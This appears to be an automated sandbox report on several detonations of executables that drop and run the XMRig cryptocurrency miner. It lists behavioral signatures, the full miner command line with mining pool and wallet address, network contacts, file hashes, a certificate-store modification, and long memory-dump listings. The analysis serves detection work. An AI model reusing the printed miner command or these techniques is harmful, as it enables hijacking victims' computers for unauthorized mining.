memory/2968-51-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-52-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-53-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-54-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-55-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-56-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-57-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-58-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-59-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-60-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-61-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-62-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-63-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-64-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-65-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-66-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-67-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-68-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-69-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-70-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-71-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-72-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-73-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-74-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-75-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-76-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-77-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-78-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-79-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-80-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-81-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-82-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-83-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
memory/2968-84-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2024-05-22 15:12
Reported
2024-05-22 16:26
Platform
win10v2004-20240426-en
Max time kernel
1793s
Max time network
1802s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3512 wrote to memory of 4816 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3512 wrote to memory of 4816 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.72.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4816-14-0x00000211424A0000-0x00000211424C0000-memory.dmp
memory/4816-15-0x00000211424D0000-0x00000211424F0000-memory.dmp
memory/4816-16-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-19-0x0000021142510000-0x0000021142530000-memory.dmp
memory/4816-18-0x00000211424F0000-0x0000021142510000-memory.dmp
memory/4816-17-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-20-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-21-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-22-0x00000211424F0000-0x0000021142510000-memory.dmp
memory/4816-23-0x0000021142510000-0x0000021142530000-memory.dmp
memory/4816-24-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-25-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-26-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-27-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-28-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-29-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-30-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-31-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-32-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-33-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-34-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-35-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-36-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-37-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-38-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-39-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-40-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-41-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-42-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-43-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-44-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-45-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-46-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-47-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-48-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-49-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-50-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-51-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-52-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-53-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-54-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-55-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-56-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-57-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-58-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-59-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-60-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-61-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-62-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-63-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-64-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-65-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-66-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-67-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-68-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-69-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-70-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-71-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-72-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-73-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-74-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-75-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-76-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-77-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-78-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-79-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-80-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-81-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
memory/4816-82-0x00007FF71FA30000-0x00007FF720533000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-22 15:12
Reported
2024-05-22 16:22
Platform
win10v2004-20240508-en
Max time kernel
1794s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2380 wrote to memory of 4564 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2380 wrote to memory of 4564 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| NL | 23.62.61.106:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 52.111.227.14:443 | tcp | |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.109.69.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4564-16-0x0000028291E80000-0x0000028291EA0000-memory.dmp
memory/4564-17-0x0000028293780000-0x00000282937A0000-memory.dmp
memory/4564-18-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-19-0x0000028326160000-0x0000028326180000-memory.dmp
memory/4564-20-0x00000282937A0000-0x00000282937C0000-memory.dmp
memory/4564-21-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-22-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-24-0x0000028326160000-0x0000028326180000-memory.dmp
memory/4564-23-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-25-0x00000282937A0000-0x00000282937C0000-memory.dmp
memory/4564-26-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-27-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-28-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-29-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-30-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-31-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-32-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-33-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-34-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-35-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-36-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-37-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-38-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-39-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-40-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-41-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-42-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-43-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-44-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-45-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-46-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-47-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-48-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-49-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-50-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-51-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-52-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-53-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-54-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-55-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-56-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-57-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-58-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-59-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-60-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-61-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-62-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-63-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-64-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-65-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-66-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-67-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-68-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-69-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-70-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-71-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-72-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-73-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-74-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-75-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-76-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-77-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-78-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-79-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-80-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-81-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-82-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-83-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
memory/4564-84-0x00007FF709F50000-0x00007FF70AA53000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-05-22 15:12
Reported
2024-05-22 16:22
Platform
win10v2004-20240426-en
Max time kernel
1794s
Max time network
1790s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b